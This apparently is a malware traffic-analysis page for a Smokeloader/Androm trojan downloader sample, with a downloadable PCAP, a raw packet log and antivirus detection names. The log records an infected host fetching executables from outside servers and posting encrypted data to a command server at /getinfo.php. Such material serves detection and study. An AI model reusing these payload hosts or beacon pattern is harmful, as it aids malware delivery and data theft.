Androm Smoke Smokeloader Trojan Downloader TEAMVIEWER Malware PCAP file download traffic analysis sample POST /getinfo.php

Download Attachments

  • 1 pcap smoke
    Date added: November 30, 2017 2:48 am Added by: admin File size: 159 KB Downloads: 20



2017-11-29 18:11:36.605607 IP 192.168.1.102.50722 > 185.81.113.106.80: Flags [P.], seq 4256379733:4256380219, ack 3603920812, win 256, length 486: HTTP: GET /ital2.exe HTTP/1.1
E…..@….h…f.Qqj.”.P..3U..w.P….e..GET /ital2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 185.81.113.106/ital2.exe
Connection: Keep-Alive

2017-11-29 18:11:50.362671 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 227694528:227694552, ack 2689082226, win 32506, length 24
E..@.\@…*….f..<….2..W..H#rP.~……0………………….
2017-11-29 18:12:08.945063 IP 192.168.1.102.50723 > 200.7.98.161.80: Flags [P.], seq 1108336087:1108336574, ack 1144913718, win 256, length 487: HTTP: GET /myonly3d.exe HTTP/1.1
E…G.@……..f..b..#.PB…D=.6P….:..GET /myonly3d.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 200.7.98.161
Connection: Keep-Alive

2017-11-29 18:12:45.503592 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 24:48, ack 25, win 32500, length 24
E..@.^@…*….f..<….2..W..H#.P.~……0………………….
2017-11-29 18:13:18.484054 IP 192.168.1.102.50730 > 162.220.223.28.5938: Flags [P.], seq 866286821:866286830, ack 2183845084, win 256, length 9
E..1O(@…g….f…..*.23.|..*..P…^….$…….
2017-11-29 18:13:18.853727 IP 192.168.1.102.50731 > 185.188.32.1.5938: Flags [P.], seq 2125942477:2125942913, ack 550455659, win 256, length 436
2017-11-29 18:13:19.349754 IP 192.168.1.102.50732 > 185.188.32.1.5938: Flags [P.], seq 3311450262:3311450611, ack 4281986318, win 256, length 349
2017-11-29 18:13:19.671560 IP 192.168.1.102.50733 > 185.188.32.1.5938: Flags [P.], seq 3149117744:3149118096, ack 1353054046, win 256, length 352
2017-11-29 18:13:19.989973 IP 192.168.1.102.50734 > 185.188.32.1.5938: Flags [P.], seq 3746683493:3746684138, ack 84270171, win 256, length 645
2017-11-29 18:13:20.238004 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 3689190432:3689190469, ack 1512029063, win 256, length 37
2017-11-29 18:13:20.267772 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 37:134, ack 33, win 256, length 97
2017-11-29 18:13:20.414540 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 134:199, ack 169, win 255, length 65
2017-11-29 18:13:20.566479 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 199:360, ack 169, win 255, length 161
2017-11-29 18:13:20.586132 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 360:843, ack 929, win 253, length 483
2017-11-29 18:13:20.760512 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 3674330352:3674330524, ack 538594737, win 258, length 172
E…?.@….Z…f4….1…… .M.P…_…………..Z.>I&.|6″..].n ..L…2.M..l…=…*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….P…………..client.teamviewer.com……….
…………………………….

2017-11-29 18:13:20.780355 IP 192.168.1.102.50736 > 194.88.106.6.80: Flags [P.], seq 278013888:278014102, ack 4109617761, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..0.P..’….aP….9..POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 378
Content-Type: multipart/form-data; boundary=——–076788870678337

2017-11-29 18:13:20.886960 IP 192.168.1.102.50736 > 194.88.106.6.80: Flags [P.], seq 214:592, ack 1, win 256, length 378: HTTP
E…1.@….Q…f.Xj..0.P..(….aP….u..———-076788870678337
Content-Disposition: form-data; name="u"
Content-Type: multipart/form-data
Content-Transfer-Encoding: binary

…K.P Lx….L..}6.WBg….h@.OqjA……..x….5…^.5eJFm..]`_.uU..N.y.. ….;.}V.J……c. .’….HQ.U.!.].#…s%.=..B.D.8Hi…….u.g..T…..k .Y..J-._.%{………..?Ch..v.x.u…….\…..ni……>.%.u56
———-076788870678337–

2017-11-29 18:13:30.231367 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 172:338, ack 4779, win 258, length 166
2017-11-29 18:13:30.421369 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 338:407, ack 4870, win 258, length 69
2017-11-29 18:13:33.755763 IP 192.168.1.102.50739 > 64.111.126.113.80: Flags [P.], seq 4204223377:4204223868, ack 987423020, win 256, length 491: HTTP: GET /11/cftmon.exe HTTP/1.1
E…w.@……..f@o~q.3.P..[.:..,P…….GET /11/cftmon.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: memorywedge.net
Connection: Keep-Alive

2017-11-29 18:14:22.061175 IP 192.168.1.102.50742 > 194.88.106.6.80: Flags [P.], seq 2282295907:2282296121, ack 1658032748, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..6.P. .cb..lP….4..POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 252
Content-Type: multipart/form-data; boundary=——–827025447422263

2017-11-29 18:14:22.175999 IP 192.168.1.102.50742 > 194.88.106.6.80: Flags [P.], seq 214:466, ack 1, win 256, length 252: HTTP
E..$1.@……..f.Xj..6.P. .9b..lP…….———-827025447422263
Content-Disposition: form-data; name="u"
Content-Type: multipart/form-data
Content-Transfer-Encoding: binary

…K.P Lx….L..}6.WBg….h@.OqjA……..x….5…^.5eJFm..]`_.uU..N.y.. ..,.E
———-827025447422263–

2017-11-29 18:14:35.751580 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 72:96, ack 73, win 32488, length 24
E..@.b@…*….f..<….2..X..H#.P.~..0…0………………….
2017-11-29 18:14:53.912795 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 4178893904:4178894084, ack 165261226, win 256, length 180
E…..@….;…fhW…;…..P …P…$…………..Z.>….7;….|…u.x..o8..W…`…*.,.+.0./…..$.#.(.’.
. ………=.<.5./.
…X………cdn.onenote.net……….
…………………………………..#………..
2017-11-29 18:14:53.947807 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 180:306, ack 4579, win 256, length 126
2017-11-29 18:14:53.967006 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 306:456, ack 4821, win 255, length 150
2017-11-29 18:15:12.457665 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 867:891, ack 3332, win 256, length 24
E..@(z@….J…f…../.2….Z…P……..0………………….
2017-11-29 18:15:23.266174 IP 192.168.1.102.50749 > 194.88.106.6.80: Flags [P.], seq 2860280144:2860280358, ack 4242497867, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..=.P.|iP..aKP…….POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 252
Content-Type: multipart/form-data; boundary=——–278426458030437

2017-11-29 18:15:23.368601 IP 192.168.1.102.50749 > 194.88.106.6.80: Flags [P.], seq 214:466, ack 1, win 256, length 252: HTTP
E..$1.@……..f.Xj..=.P.|j&..aKP…<6..———-278426458030437
Content-Disposition: form-data; name="u"

 

55 engines detected this file
SHA-256 f045c39e3156d56eb6dd4c66f94aae17cdbcb333621192d2f820f7344a9678d7
File name output.112342253.txt
File size 187 KB
Last analysis 2017-11-27 07:59:56 UTC
Community score -156

Ikarus: Trojan-Downloader.Win32.Zurgop
Jiangmin: Backdoor.Androm.thp
K7AntiVirus: Trojan-Downloader ( 004f875e1 )
K7GW: Trojan-Downloader ( 004f875e1 )
Kaspersky: Backdoor.Win32.Androm.obpp
Malwarebytes: Trojan.SmokeLoader
McAfee: RDN/Generic BackDoor
McAfee-GW-Edition: RDN/Generic BackDoor
Microsoft: TrojanDownloader:Win32/Dofoil.AC
NANO-Antivirus: Trojan.Win32.Androm.etrvfo
Palo Alto Networks: generic.ml
Panda: Trj/WLT.D
Qihoo-360: Win32/Trojan.Multi.daf
Rising: Backdoor.Androm!8.113 (KTSE)

 
